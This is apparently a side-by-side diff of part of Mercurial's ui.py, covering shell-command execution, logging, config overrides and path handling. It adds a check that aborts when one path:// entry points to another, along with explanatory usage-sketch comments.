1910 onerr=None,
1910 onerr=None,
1911 errprefix=None,
1911 errprefix=None,
1912 blockedtag=None,
1912 blockedtag=None,
1913 ):
1913 ):
1914 """execute shell command with appropriate output stream. command
1914 """execute shell command with appropriate output stream. command
1915 output will be redirected if fout is not stdout.
1915 output will be redirected if fout is not stdout.
1916
1916
1917 if command fails and onerr is None, return status, else raise onerr
1917 if command fails and onerr is None, return status, else raise onerr
1918 object as exception.
1918 object as exception.
1919 """
1919 """
1920 if blockedtag is None:
1920 if blockedtag is None:
1921 # Long cmds tend to be due to an absolute path in cmd. Keep
1921 # Long cmds tend to be due to an absolute path in cmd. Keep
1922 # the tail end instead
1922 # the tail end instead
1923 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1923 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1924 blockedtag = b'unknown_system_' + cmdsuffix
1924 blockedtag = b'unknown_system_' + cmdsuffix
1925 out = self._fout
1925 out = self._fout
1926 if any(s[1] for s in self._bufferstates):
1926 if any(s[1] for s in self._bufferstates):
1927 out = self
1927 out = self
1928 with self.timeblockedsection(blockedtag):
1928 with self.timeblockedsection(blockedtag):
1929 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1929 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1930 if rc and onerr:
1930 if rc and onerr:
1931 errmsg = b'%s %s' % (
1931 errmsg = b'%s %s' % (
1932 procutil.shellsplit(cmd)[0],
1932 procutil.shellsplit(cmd)[0],
1933 procutil.explainexit(rc),
1933 procutil.explainexit(rc),
1934 )
1934 )
1935 if errprefix:
1935 if errprefix:
1936 errmsg = b'%s: %s' % (errprefix, errmsg)
1936 errmsg = b'%s: %s' % (errprefix, errmsg)
1937 raise onerr(errmsg)
1937 raise onerr(errmsg)
1938 return rc
1938 return rc
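
# Usage sketch, assuming a ui instance `u` and a POSIX shell; with `onerr`
# a non-zero exit status raises instead of being returned:
#
#   rc = u.system(b"ls -l", blockedtag=b'example')  # rc is the exit status
#   u.system(b"false", onerr=error.Abort, errprefix=b"listing failed")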
1939
1939
1940 def _runsystem(self, cmd, environ, cwd, out):
1940 def _runsystem(self, cmd, environ, cwd, out):
1941 """actually execute the given shell command (can be overridden by
1941 """actually execute the given shell command (can be overridden by
1942 extensions like chg)"""
1942 extensions like chg)"""
1943 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1943 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1944
1944
1945 def traceback(self, exc=None, force=False):
1945 def traceback(self, exc=None, force=False):
1946 """print exception traceback if traceback printing enabled or forced.
1946 """print exception traceback if traceback printing enabled or forced.
1947 only to be called from an exception handler. returns True if a
1947 only to be called from an exception handler. returns True if a
1948 traceback was printed."""
1948 traceback was printed."""
1949 if self.tracebackflag or force:
1949 if self.tracebackflag or force:
1950 if exc is None:
1950 if exc is None:
1951 exc = sys.exc_info()
1951 exc = sys.exc_info()
1952 cause = getattr(exc[1], 'cause', None)
1952 cause = getattr(exc[1], 'cause', None)
1953
1953
1954 if cause is not None:
1954 if cause is not None:
1955 causetb = traceback.format_tb(cause[2])
1955 causetb = traceback.format_tb(cause[2])
1956 exctb = traceback.format_tb(exc[2])
1956 exctb = traceback.format_tb(exc[2])
1957 exconly = traceback.format_exception_only(cause[0], cause[1])
1957 exconly = traceback.format_exception_only(cause[0], cause[1])
1958
1958
1959 # exclude frame where 'exc' was chained and rethrown from exctb
1959 # exclude frame where 'exc' was chained and rethrown from exctb
1960 self.write_err(
1960 self.write_err(
1961 b'Traceback (most recent call last):\n',
1961 b'Traceback (most recent call last):\n',
1962 encoding.strtolocal(''.join(exctb[:-1])),
1962 encoding.strtolocal(''.join(exctb[:-1])),
1963 encoding.strtolocal(''.join(causetb)),
1963 encoding.strtolocal(''.join(causetb)),
1964 encoding.strtolocal(''.join(exconly)),
1964 encoding.strtolocal(''.join(exconly)),
1965 )
1965 )
1966 else:
1966 else:
1967 output = traceback.format_exception(exc[0], exc[1], exc[2])
1967 output = traceback.format_exception(exc[0], exc[1], exc[2])
1968 self.write_err(encoding.strtolocal(''.join(output)))
1968 self.write_err(encoding.strtolocal(''.join(output)))
1969 return self.tracebackflag or force
1969 return self.tracebackflag or force
1970
1970
1971 def geteditor(self):
1971 def geteditor(self):
1972 '''return editor to use'''
1972 '''return editor to use'''
1973 if pycompat.sysplatform == b'plan9':
1973 if pycompat.sysplatform == b'plan9':
1974 # vi is the MIPS instruction simulator on Plan 9. We
1974 # vi is the MIPS instruction simulator on Plan 9. We
1975 # instead default to E to plumb commit messages to
1975 # instead default to E to plumb commit messages to
1976 # avoid confusion.
1976 # avoid confusion.
1977 editor = b'E'
1977 editor = b'E'
1978 elif pycompat.isdarwin:
1978 elif pycompat.isdarwin:
1979 # vi on darwin is POSIX compatible to a fault, and that includes
1979 # vi on darwin is POSIX compatible to a fault, and that includes
1980 # exiting non-zero if you make any mistake when running an ex
1980 # exiting non-zero if you make any mistake when running an ex
1981 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1981 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1982 # while s/vi/vim/ doesn't.
1982 # while s/vi/vim/ doesn't.
1983 editor = b'vim'
1983 editor = b'vim'
1984 else:
1984 else:
1985 editor = b'vi'
1985 editor = b'vi'
1986 return encoding.environ.get(b"HGEDITOR") or self.config(
1986 return encoding.environ.get(b"HGEDITOR") or self.config(
1987 b"ui", b"editor", editor
1987 b"ui", b"editor", editor
1988 )
1988 )
1989
1989
1990 @util.propertycache
1990 @util.propertycache
1991 def _progbar(self):
1991 def _progbar(self):
1992 """setup the progbar singleton to the ui object"""
1992 """setup the progbar singleton to the ui object"""
1993 if (
1993 if (
1994 self.quiet
1994 self.quiet
1995 or self.debugflag
1995 or self.debugflag
1996 or self.configbool(b'progress', b'disable')
1996 or self.configbool(b'progress', b'disable')
1997 or not progress.shouldprint(self)
1997 or not progress.shouldprint(self)
1998 ):
1998 ):
1999 return None
1999 return None
2000 return getprogbar(self)
2000 return getprogbar(self)
2001
2001
2002 def _progclear(self):
2002 def _progclear(self):
2003 """clear progress bar output if any. use it before any output"""
2003 """clear progress bar output if any. use it before any output"""
2004 if not haveprogbar(): # nothing loaded yet
2004 if not haveprogbar(): # nothing loaded yet
2005 return
2005 return
2006 if self._progbar is not None and self._progbar.printed:
2006 if self._progbar is not None and self._progbar.printed:
2007 self._progbar.clear()
2007 self._progbar.clear()
2008
2008
2009 def makeprogress(self, topic, unit=b"", total=None):
2009 def makeprogress(self, topic, unit=b"", total=None):
2010 """Create a progress helper for the specified topic"""
2010 """Create a progress helper for the specified topic"""
2011 if getattr(self._fmsgerr, 'structured', False):
2011 if getattr(self._fmsgerr, 'structured', False):
2012 # channel for machine-readable output with metadata, just send
2012 # channel for machine-readable output with metadata, just send
2013 # raw information
2013 # raw information
2014 # TODO: consider porting some useful information (e.g. estimated
2014 # TODO: consider porting some useful information (e.g. estimated
2015 # time) from progbar. we might want to support update delay to
2015 # time) from progbar. we might want to support update delay to
2016 # reduce the cost of transferring progress messages.
2016 # reduce the cost of transferring progress messages.
2017 def updatebar(topic, pos, item, unit, total):
2017 def updatebar(topic, pos, item, unit, total):
2018 self._fmsgerr.write(
2018 self._fmsgerr.write(
2019 None,
2019 None,
2020 type=b'progress',
2020 type=b'progress',
2021 topic=topic,
2021 topic=topic,
2022 pos=pos,
2022 pos=pos,
2023 item=item,
2023 item=item,
2024 unit=unit,
2024 unit=unit,
2025 total=total,
2025 total=total,
2026 )
2026 )
2027
2027
2028 elif self._progbar is not None:
2028 elif self._progbar is not None:
2029 updatebar = self._progbar.progress
2029 updatebar = self._progbar.progress
2030 else:
2030 else:
2031
2031
2032 def updatebar(topic, pos, item, unit, total):
2032 def updatebar(topic, pos, item, unit, total):
2033 pass
2033 pass
2034
2034
2035 return scmutil.progress(self, updatebar, topic, unit, total)
2035 return scmutil.progress(self, updatebar, topic, unit, total)
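
# Usage sketch, assuming a ui instance `u`; the scmutil.progress helper
# returned here is commonly driven as a context manager:
#
#   with u.makeprogress(_(b'scanning'), unit=_(b'files'), total=100) as prog:
#       for item in items:        # `items` is a hypothetical iterable
#           prog.increment()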
2036
2036
2037 def getlogger(self, name):
2037 def getlogger(self, name):
2038 """Returns a logger of the given name; or None if not registered"""
2038 """Returns a logger of the given name; or None if not registered"""
2039 return self._loggers.get(name)
2039 return self._loggers.get(name)
2040
2040
2041 def setlogger(self, name, logger):
2041 def setlogger(self, name, logger):
2042 """Install logger which can be identified later by the given name
2042 """Install logger which can be identified later by the given name
2043
2043
2044 More than one logger can be registered. Use the extension or module
2044 More than one logger can be registered. Use the extension or module
2045 name to uniquely identify the logger instance.
2045 name to uniquely identify the logger instance.
2046 """
2046 """
2047 self._loggers[name] = logger
2047 self._loggers[name] = logger
2048
2048
2049 def log(self, event, msgfmt, *msgargs, **opts):
2049 def log(self, event, msgfmt, *msgargs, **opts):
2050 """hook for logging facility extensions
2050 """hook for logging facility extensions
2051
2051
2052 event should be a readily-identifiable subsystem, which will
2052 event should be a readily-identifiable subsystem, which will
2053 allow filtering.
2053 allow filtering.
2054
2054
2055 msgfmt should be a newline-terminated format string to log, and
2055 msgfmt should be a newline-terminated format string to log, and
2056 *msgargs are %-formatted into it.
2056 *msgargs are %-formatted into it.
2057
2057
2058 **opts currently has no defined meanings.
2058 **opts currently has no defined meanings.
2059 """
2059 """
2060 if not self._loggers:
2060 if not self._loggers:
2061 return
2061 return
2062 activeloggers = [
2062 activeloggers = [
2063 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
2063 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
2064 ]
2064 ]
2065 if not activeloggers:
2065 if not activeloggers:
2066 return
2066 return
2067 msg = msgfmt % msgargs
2067 msg = msgfmt % msgargs
2068 opts = pycompat.byteskwargs(opts)
2068 opts = pycompat.byteskwargs(opts)
2069 # guard against recursion from e.g. ui.debug()
2069 # guard against recursion from e.g. ui.debug()
2070 registeredloggers = self._loggers
2070 registeredloggers = self._loggers
2071 self._loggers = {}
2071 self._loggers = {}
2072 try:
2072 try:
2073 for logger in activeloggers:
2073 for logger in activeloggers:
2074 logger.log(self, event, msg, opts)
2074 logger.log(self, event, msg, opts)
2075 finally:
2075 finally:
2076 self._loggers = registeredloggers
2076 self._loggers = registeredloggers
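
# Usage sketch: an extension registers a logger once and then emits events
# through ui.log() (names below are illustrative):
#
#   u.setlogger(b'myext', mylogger)   # mylogger implements tracked() and log()
#   u.log(b'myext', b'processed %d items\n', count)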
2077
2077
2078 def label(self, msg, label):
2078 def label(self, msg, label):
2079 """style msg based on supplied label
2079 """style msg based on supplied label
2080
2080
2081 If some color mode is enabled, this will add the necessary control
2081 If some color mode is enabled, this will add the necessary control
2082 characters to apply such color. In addition, 'debug' color mode adds
2082 characters to apply such color. In addition, 'debug' color mode adds
2083 markup showing which label affects a piece of text.
2083 markup showing which label affects a piece of text.
2084
2084
2085 ui.write(s, 'label') is equivalent to
2085 ui.write(s, 'label') is equivalent to
2086 ui.write(ui.label(s, 'label')).
2086 ui.write(ui.label(s, 'label')).
2087 """
2087 """
2088 if self._colormode is not None:
2088 if self._colormode is not None:
2089 return color.colorlabel(self, msg, label)
2089 return color.colorlabel(self, msg, label)
2090 return msg
2090 return msg
2091
2091
2092 def develwarn(self, msg, stacklevel=1, config=None):
2092 def develwarn(self, msg, stacklevel=1, config=None):
2093 """issue a developer warning message
2093 """issue a developer warning message
2094
2094
2095 Use 'stacklevel' to report the offender some layers further up in the
2095 Use 'stacklevel' to report the offender some layers further up in the
2096 stack.
2096 stack.
2097 """
2097 """
2098 if not self.configbool(b'devel', b'all-warnings'):
2098 if not self.configbool(b'devel', b'all-warnings'):
2099 if config is None or not self.configbool(b'devel', config):
2099 if config is None or not self.configbool(b'devel', config):
2100 return
2100 return
2101 msg = b'devel-warn: ' + msg
2101 msg = b'devel-warn: ' + msg
2102 stacklevel += 1 # get in develwarn
2102 stacklevel += 1 # get in develwarn
2103 if self.tracebackflag:
2103 if self.tracebackflag:
2104 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2104 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2105 self.log(
2105 self.log(
2106 b'develwarn',
2106 b'develwarn',
2107 b'%s at:\n%s'
2107 b'%s at:\n%s'
2108 % (msg, b''.join(util.getstackframes(stacklevel))),
2108 % (msg, b''.join(util.getstackframes(stacklevel))),
2109 )
2109 )
2110 else:
2110 else:
2111 curframe = inspect.currentframe()
2111 curframe = inspect.currentframe()
2112 calframe = inspect.getouterframes(curframe, 2)
2112 calframe = inspect.getouterframes(curframe, 2)
2113 fname, lineno, fmsg = calframe[stacklevel][1:4]
2113 fname, lineno, fmsg = calframe[stacklevel][1:4]
2114 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2114 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2115 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2115 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2116 self.log(
2116 self.log(
2117 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2117 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2118 )
2118 )
2119
2119
2120 # avoid cycles
2120 # avoid cycles
2121 del curframe
2121 del curframe
2122 del calframe
2122 del calframe
2123
2123
2124 def deprecwarn(self, msg, version, stacklevel=2):
2124 def deprecwarn(self, msg, version, stacklevel=2):
2125 """issue a deprecation warning
2125 """issue a deprecation warning
2126
2126
2127 - msg: message explaining what is deprecated and how to upgrade,
2127 - msg: message explaining what is deprecated and how to upgrade,
2128 - version: last version where the API will be supported,
2128 - version: last version where the API will be supported,
2129 """
2129 """
2130 if not (
2130 if not (
2131 self.configbool(b'devel', b'all-warnings')
2131 self.configbool(b'devel', b'all-warnings')
2132 or self.configbool(b'devel', b'deprec-warn')
2132 or self.configbool(b'devel', b'deprec-warn')
2133 ):
2133 ):
2134 return
2134 return
2135 msg += (
2135 msg += (
2136 b"\n(compatibility will be dropped after Mercurial-%s,"
2136 b"\n(compatibility will be dropped after Mercurial-%s,"
2137 b" update your code.)"
2137 b" update your code.)"
2138 ) % version
2138 ) % version
2139 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2139 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
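
# Usage sketch (only emits output when devel.all-warnings or
# devel.deprec-warn is enabled; the version string is illustrative):
#
#   u.deprecwarn(b"foo() is deprecated, use bar() instead", b'5.9')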
2140
2140
2141 def exportableenviron(self):
2141 def exportableenviron(self):
2142 """The environment variables that are safe to export, e.g. through
2142 """The environment variables that are safe to export, e.g. through
2143 hgweb.
2143 hgweb.
2144 """
2144 """
2145 return self._exportableenviron
2145 return self._exportableenviron
2146
2146
2147 @contextlib.contextmanager
2147 @contextlib.contextmanager
2148 def configoverride(self, overrides, source=b""):
2148 def configoverride(self, overrides, source=b""):
2149 """Context manager for temporary config overrides
2149 """Context manager for temporary config overrides
2150 `overrides` must be a dict of the following structure:
2150 `overrides` must be a dict of the following structure:
2151 {(section, name) : value}"""
2151 {(section, name) : value}"""
2152 backups = {}
2152 backups = {}
2153 try:
2153 try:
2154 for (section, name), value in overrides.items():
2154 for (section, name), value in overrides.items():
2155 backups[(section, name)] = self.backupconfig(section, name)
2155 backups[(section, name)] = self.backupconfig(section, name)
2156 self.setconfig(section, name, value, source)
2156 self.setconfig(section, name, value, source)
2157 yield
2157 yield
2158 finally:
2158 finally:
2159 for __, backup in backups.items():
2159 for __, backup in backups.items():
2160 self.restoreconfig(backup)
2160 self.restoreconfig(backup)
2161 # just restoring ui.quiet config to the previous value is not enough
2161 # just restoring ui.quiet config to the previous value is not enough
2162 # as it does not update ui.quiet class member
2162 # as it does not update ui.quiet class member
2163 if (b'ui', b'quiet') in overrides:
2163 if (b'ui', b'quiet') in overrides:
2164 self.fixconfig(section=b'ui')
2164 self.fixconfig(section=b'ui')
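
# Usage sketch, assuming a ui instance `u`; the override is rolled back when
# the with-block exits:
#
#   with u.configoverride({(b'ui', b'quiet'): b'yes'}, b'my-extension'):
#       pass  # code here runs with ui.quiet forced on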
2165
2165
2166 def estimatememory(self):
2166 def estimatememory(self):
2167 """Provide an estimate for the available system memory in Bytes.
2167 """Provide an estimate for the available system memory in Bytes.
2168
2168
2169 This can be overridden via ui.available-memory. It returns None if
2169 This can be overridden via ui.available-memory. It returns None if
2170 no estimate can be computed.
2170 no estimate can be computed.
2171 """
2171 """
2172 value = self.config(b'ui', b'available-memory')
2172 value = self.config(b'ui', b'available-memory')
2173 if value is not None:
2173 if value is not None:
2174 try:
2174 try:
2175 return util.sizetoint(value)
2175 return util.sizetoint(value)
2176 except error.ParseError:
2176 except error.ParseError:
2177 raise error.ConfigError(
2177 raise error.ConfigError(
2178 _(b"ui.available-memory value is invalid ('%s')") % value
2178 _(b"ui.available-memory value is invalid ('%s')") % value
2179 )
2179 )
2180 return util._estimatememory()
2180 return util._estimatememory()
2181
2181
2182
2182
2183 class paths(dict):
2183 class paths(dict):
2184 """Represents a collection of paths and their configs.
2184 """Represents a collection of paths and their configs.
2185
2185
2186 Data is initially derived from ui instances and the config files they have
2186 Data is initially derived from ui instances and the config files they have
2187 loaded.
2187 loaded.
2188 """
2188 """
2189
2189
2190 def __init__(self, ui):
2190 def __init__(self, ui):
2191 dict.__init__(self)
2191 dict.__init__(self)
2192
2192
2193 for name, loc in ui.configitems(b'paths', ignoresub=True):
2193 for name, loc in ui.configitems(b'paths', ignoresub=True):
2194 # No location is the same as not existing.
2194 # No location is the same as not existing.
2195 if not loc:
2195 if not loc:
2196 continue
2196 continue
2197 loc, sub_opts = ui.configsuboptions(b'paths', name)
2197 loc, sub_opts = ui.configsuboptions(b'paths', name)
2198 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
2198 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
2199
2199
2200 for name, p in sorted(self.items()):
2200 for name, p in sorted(self.items()):
2201 p.chain_path(ui, self)
2201 p.chain_path(ui, self)
2202
2202
2203 def getpath(self, ui, name, default=None):
2203 def getpath(self, ui, name, default=None):
2204 """Return a ``path`` from a string, falling back to default.
2204 """Return a ``path`` from a string, falling back to default.
2205
2205
2206 ``name`` can be a named path or a location. Locations are filesystem
2206 ``name`` can be a named path or a location. Locations are filesystem
2207 paths or URIs.
2207 paths or URIs.
2208
2208
2209 Returns None if ``name`` is not a registered path, a URI, or a local
2209 Returns None if ``name`` is not a registered path, a URI, or a local
2210 path to a repo.
2210 path to a repo.
2211 """
2211 """
2212 # Only fall back to default if no path was requested.
2212 # Only fall back to default if no path was requested.
2213 if name is None:
2213 if name is None:
2214 if not default:
2214 if not default:
2215 default = ()
2215 default = ()
2216 elif not isinstance(default, (tuple, list)):
2216 elif not isinstance(default, (tuple, list)):
2217 default = (default,)
2217 default = (default,)
2218 for k in default:
2218 for k in default:
2219 try:
2219 try:
2220 return self[k]
2220 return self[k]
2221 except KeyError:
2221 except KeyError:
2222 continue
2222 continue
2223 return None
2223 return None
2224
2224
2225 # Most likely empty string.
2225 # Most likely empty string.
2226 # This may need to raise in the future.
2226 # This may need to raise in the future.
2227 if not name:
2227 if not name:
2228 return None
2228 return None
2229
2229
2230 try:
2230 try:
2231 return self[name]
2231 return self[name]
2232 except KeyError:
2232 except KeyError:
2233 # Try to resolve as a local path or URI.
2233 # Try to resolve as a local path or URI.
2234 try:
2234 try:
2235 # we pass the ui instance because a warning might need to be issued
2235 # we pass the ui instance because a warning might need to be issued
2236 return path(ui, None, rawloc=name)
2236 return path(ui, None, rawloc=name)
2237 except ValueError:
2237 except ValueError:
2238 raise error.RepoError(_(b'repository %s does not exist') % name)
2238 raise error.RepoError(_(b'repository %s does not exist') % name)
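
# Usage sketch (illustrative): a None name falls back to the default names,
# while a concrete name or location is resolved directly:
#
#   pths = paths(ui)
#   p = pths.getpath(ui, None, default=(b'default-push', b'default'))
#   # p is a `path` instance or None; an unknown, non-URL name passed as
#   # `name` raises error.RepoError instead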
2239
2239
2240
2240
2241 _pathsuboptions = {}
2241 _pathsuboptions = {}
2242
2242
2243
2243
2244 def pathsuboption(option, attr):
2244 def pathsuboption(option, attr):
2245 """Decorator used to declare a path sub-option.
2245 """Decorator used to declare a path sub-option.
2246
2246
2247 Arguments are the sub-option name and the attribute it should set on
2247 Arguments are the sub-option name and the attribute it should set on
2248 ``path`` instances.
2248 ``path`` instances.
2249
2249
2250 The decorated function will receive as arguments a ``ui`` instance,
2250 The decorated function will receive as arguments a ``ui`` instance,
2251 ``path`` instance, and the string value of this option from the config.
2251 ``path`` instance, and the string value of this option from the config.
2252 The function should return the value that will be set on the ``path``
2252 The function should return the value that will be set on the ``path``
2253 instance.
2253 instance.
2254
2254
2255 This decorator can be used to perform additional verification of
2255 This decorator can be used to perform additional verification of
2256 sub-options and to change the type of sub-options.
2256 sub-options and to change the type of sub-options.
2257 """
2257 """
2258
2258
2259 def register(func):
2259 def register(func):
2260 _pathsuboptions[option] = (attr, func)
2260 _pathsuboptions[option] = (attr, func)
2261 return func
2261 return func
2262
2262
2263 return register
2263 return register
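
# A hypothetical sub-option declaration sketching how the decorator is used;
# the "color" sub-option below does not exist in Mercurial:
#
#   @pathsuboption(b'color', b'color')
#   def colorpathoption(ui, path, value):
#       if value not in (b'red', b'blue'):
#           ui.warn(_(b'(paths.%s:color ignored, unknown value)\n') % path.name)
#           return None
#       return value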
2264
2264
2265
2265
2266 @pathsuboption(b'pushurl', b'pushloc')
2266 @pathsuboption(b'pushurl', b'pushloc')
2267 def pushurlpathoption(ui, path, value):
2267 def pushurlpathoption(ui, path, value):
2268 u = util.url(value)
2268 u = util.url(value)
2269 # Actually require a URL.
2269 # Actually require a URL.
2270 if not u.scheme:
2270 if not u.scheme:
2271 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2271 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2272 return None
2272 return None
2273
2273
2274 # Don't support the #foo syntax in the push URL to declare the branch to
2274 # Don't support the #foo syntax in the push URL to declare the branch to
2275 # push.
2275 # push.
2276 if u.fragment:
2276 if u.fragment:
2277 ui.warn(
2277 ui.warn(
2278 _(
2278 _(
2279 b'("#fragment" in paths.%s:pushurl not supported; '
2279 b'("#fragment" in paths.%s:pushurl not supported; '
2280 b'ignoring)\n'
2280 b'ignoring)\n'
2281 )
2281 )
2282 % path.name
2282 % path.name
2283 )
2283 )
2284 u.fragment = None
2284 u.fragment = None
2285
2285
2286 return bytes(u)
2286 return bytes(u)
2287
2287
2288
2288
2289 @pathsuboption(b'pushrev', b'pushrev')
2289 @pathsuboption(b'pushrev', b'pushrev')
2290 def pushrevpathoption(ui, path, value):
2290 def pushrevpathoption(ui, path, value):
2291 return value
2291 return value
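
# These sub-options map onto hgrc entries of the following form (an
# illustrative configuration, not taken from this changeset):
#
#   [paths]
#   default = https://example.com/repo
#   default:pushurl = ssh://example.com/repo
#   default:pushrev = .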
2292
2292
2293
2293
2294 class path(object):
2294 class path(object):
2295 """Represents an individual path and its configuration."""
2295 """Represents an individual path and its configuration."""
2296
2296
2297 def __init__(self, ui, name, rawloc=None, suboptions=None):
2297 def __init__(self, ui, name, rawloc=None, suboptions=None):
2298 """Construct a path from its config options.
2298 """Construct a path from its config options.
2299
2299
2300 ``ui`` is the ``ui`` instance the path is coming from.
2300 ``ui`` is the ``ui`` instance the path is coming from.
2301 ``name`` is the symbolic name of the path.
2301 ``name`` is the symbolic name of the path.
2302 ``rawloc`` is the raw location, as defined in the config.
2302 ``rawloc`` is the raw location, as defined in the config.
2303 ``pushloc`` is the raw location pushes should be made to.
2303 ``pushloc`` is the raw location pushes should be made to.
2304
2304
2305 If ``name`` is not defined, we require that the location be a) a local
2305 If ``name`` is not defined, we require that the location be a) a local
2306 filesystem path with a .hg directory or b) a URL. If not,
2306 filesystem path with a .hg directory or b) a URL. If not,
2307 ``ValueError`` is raised.
2307 ``ValueError`` is raised.
2308 """
2308 """
2309 if not rawloc:
2309 if not rawloc:
2310 raise ValueError(b'rawloc must be defined')
2310 raise ValueError(b'rawloc must be defined')
2311
2311
2312 # Locations may define branches via syntax <base>#<branch>.
2312 # Locations may define branches via syntax <base>#<branch>.
2313 u = util.url(rawloc)
2313 u = util.url(rawloc)
2314 branch = None
2314 branch = None
2315 if u.fragment:
2315 if u.fragment:
2316 branch = u.fragment
2316 branch = u.fragment
2317 u.fragment = None
2317 u.fragment = None
2318
2318
2319 self.url = u
2319 self.url = u
2320 # the url from the config/command line before dealing with `path://`
2321 self.raw_url = u.copy()
2320 self.branch = branch
2322 self.branch = branch
2321
2323
2322 self.name = name
2324 self.name = name
2323 self.rawloc = rawloc
2325 self.rawloc = rawloc
2324 self.loc = b'%s' % u
2326 self.loc = b'%s' % u
2325
2327
2326 self._validate_path()
2328 self._validate_path()
2327
2329
2328 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
2330 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
2329 self._own_sub_opts = {}
2331 self._own_sub_opts = {}
2330 if suboptions is not None:
2332 if suboptions is not None:
2331 self._own_sub_opts = suboptions.copy()
2333 self._own_sub_opts = suboptions.copy()
2332 sub_opts.update(suboptions)
2334 sub_opts.update(suboptions)
2333 self._all_sub_opts = sub_opts.copy()
2335 self._all_sub_opts = sub_opts.copy()
2334
2336
2335 self._apply_suboptions(ui, sub_opts)
2337 self._apply_suboptions(ui, sub_opts)
2336
2338
2337 def chain_path(self, ui, paths):
2339 def chain_path(self, ui, paths):
2338 if self.url.scheme == b'path':
2340 if self.url.scheme == b'path':
2339 assert self.url.path is None
2341 assert self.url.path is None
2340 subpath = paths[self.url.host]
2342 subpath = paths[self.url.host]
2343 if subpath.raw_url.scheme == b'path':
2344 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
2345 m %= (self.rawloc, self.url.host)
2346 raise error.Abort(m)
2341 self.url = subpath.url
2347 self.url = subpath.url
2342 self.rawloc = subpath.rawloc
2348 self.rawloc = subpath.rawloc
2343 self.loc = subpath.loc
2349 self.loc = subpath.loc
2344 if self.branch is None:
2350 if self.branch is None:
2345 self.branch = subpath.branch
2351 self.branch = subpath.branch
2346 else:
2352 else:
2347 base = self.rawloc.rsplit(b'#', 1)[0]
2353 base = self.rawloc.rsplit(b'#', 1)[0]
2348 self.rawloc = b'%s#%s' % (base, self.branch)
2354 self.rawloc = b'%s#%s' % (base, self.branch)
2349 suboptions = subpath._all_sub_opts.copy()
2355 suboptions = subpath._all_sub_opts.copy()
2350 suboptions.update(self._own_sub_opts)
2356 suboptions.update(self._own_sub_opts)
2351 self._apply_suboptions(ui, suboptions)
2357 self._apply_suboptions(ui, suboptions)
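
# Illustrative hgrc showing the `path://` indirection that chain_path()
# resolves, and the chained case this changeset now forbids (names made up):
#
#   [paths]
#   main = https://example.com/main-repo
#   alias = path://main      # ok: resolves to the location of `main`
#   broken = path://alias    # aborts: `alias` is itself a `path://` entry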
2352
2358
2353 def _validate_path(self):
2359 def _validate_path(self):
2354 # When given a raw location but not a symbolic name, validate the
2360 # When given a raw location but not a symbolic name, validate the
2355 # location is valid.
2361 # location is valid.
2356 if (
2362 if (
2357 not self.name
2363 not self.name
2358 and not self.url.scheme
2364 and not self.url.scheme
2359 and not self._isvalidlocalpath(self.loc)
2365 and not self._isvalidlocalpath(self.loc)
2360 ):
2366 ):
2361 raise ValueError(
2367 raise ValueError(
2362 b'location is not a URL or path to a local '
2368 b'location is not a URL or path to a local '
2363 b'repo: %s' % self.rawloc
2369 b'repo: %s' % self.rawloc
2364 )
2370 )
2365
2371
2366 def _apply_suboptions(self, ui, sub_options):
2372 def _apply_suboptions(self, ui, sub_options):
2367 # Now process the sub-options. If a sub-option is registered, its
2373 # Now process the sub-options. If a sub-option is registered, its
2368 # attribute will always be present. The value will be None if there
2374 # attribute will always be present. The value will be None if there
2369 # was no valid sub-option.
2375 # was no valid sub-option.
2370 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2376 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2371 if suboption not in sub_options:
2377 if suboption not in sub_options:
2372 setattr(self, attr, None)
2378 setattr(self, attr, None)
2373 continue
2379 continue
2374
2380
2375 value = func(ui, self, sub_options[suboption])
2381 value = func(ui, self, sub_options[suboption])
2376 setattr(self, attr, value)
2382 setattr(self, attr, value)
2377
2383
2378 def _isvalidlocalpath(self, path):
2384 def _isvalidlocalpath(self, path):
2379 """Returns True if the given path is a potentially valid repository.
2385 """Returns True if the given path is a potentially valid repository.
2380 This is its own function so that extensions can change the definition of
2386 This is its own function so that extensions can change the definition of
2381 'valid' in this case (like when pulling from a git repo into a hg
2387 'valid' in this case (like when pulling from a git repo into a hg
2382 one)."""
2388 one)."""
2383 try:
2389 try:
2384 return os.path.isdir(os.path.join(path, b'.hg'))
2390 return os.path.isdir(os.path.join(path, b'.hg'))
2385 # Python 2 may return TypeError. Python 3, ValueError.
2391 # Python 2 may return TypeError. Python 3, ValueError.
2386 except (TypeError, ValueError):
2392 except (TypeError, ValueError):
2387 return False
2393 return False
2388
2394
2389 @property
2395 @property
2390 def suboptions(self):
2396 def suboptions(self):
2391 """Return sub-options and their values for this path.
2397 """Return sub-options and their values for this path.
2392
2398
2393 This is intended to be used for presentation purposes.
2399 This is intended to be used for presentation purposes.
2394 """
2400 """
2395 d = {}
2401 d = {}
2396 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2402 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2397 value = getattr(self, attr)
